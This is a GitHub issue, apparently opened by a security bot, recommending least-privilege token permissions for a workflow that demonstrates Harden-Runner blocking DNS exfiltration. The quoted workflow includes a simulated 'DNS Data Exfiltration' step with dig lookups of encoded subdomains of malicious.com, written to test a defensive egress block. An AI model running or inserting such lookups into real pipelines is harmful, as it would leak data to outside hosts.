Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Harden GitHub Actions Workflow - block-dns-exfiltration.yaml #203

Open
stepsecurity-app bot opened this issue Dec 17, 2024 · 0 comments
Open

Harden GitHub Actions Workflow - block-dns-exfiltration.yaml #203

stepsecurity-app bot opened this issue Dec 17, 2024 · 0 comments

Comments

@stepsecurity-app
Copy link

GitHub Token Permissions Are Not Set to Minimum in Workflow

Summary

The GitHub token permissions in your workflow file (.github/workflows/block-dns-exfiltration.yaml) exceed the minimum required. Reducing permissions to the minimum necessary enhances security by limiting the access scope of the token, thereby lowering the risk of accidental or malicious misuse.

Why This is Important

Using excessive permissions in GitHub workflows can expose your repository to potential security risks. The GitHub token grants access to repository resources, and any unnecessary permissions increase the likelihood of sensitive actions being performed without justification. By applying the principle of least privilege, you protect your repository from unintended data exposure and ensure that each job only has access to what it absolutely needs.

Evidence of Excessive Permissions

For more context, please refer to the build log from your recent workflow run, which highlights the permissions granted to the GitHub token that exceed the recommended minimum.

Suggested Fix

Below is the updated permissions configuration, which minimizes access for the GitHub token. Update your workflow file with this suggested configuration to resolve this issue:

  name: Block DNS Exfiltration With Harden-Runner
  on:
    workflow_dispatch:
+ permissions:
+   contents: read
  jobs:
    build:
      name: Deploy
      runs-on: ubuntu-latest
      steps:
        - name: Harden Runner
          uses: step-security/harden-runner@v2
          with:
            egress-policy: block
            allowed-endpoints: |
              github.com:443
        - name: Code Checkout
          uses: actions/checkout@v4
        # DNS Data Exfiltration
        - name: DNS Data Exfiltration
          run: |
            dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
            dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
            dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
            dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
            dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com

Next Steps

Please review and update the workflow file with these minimum permissions. If additional permissions are necessary for certain steps, specify only those permissions explicitly.

For further guidance, refer to the GitHub documentation on fine-grained permissions.

Severity: High

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant
and others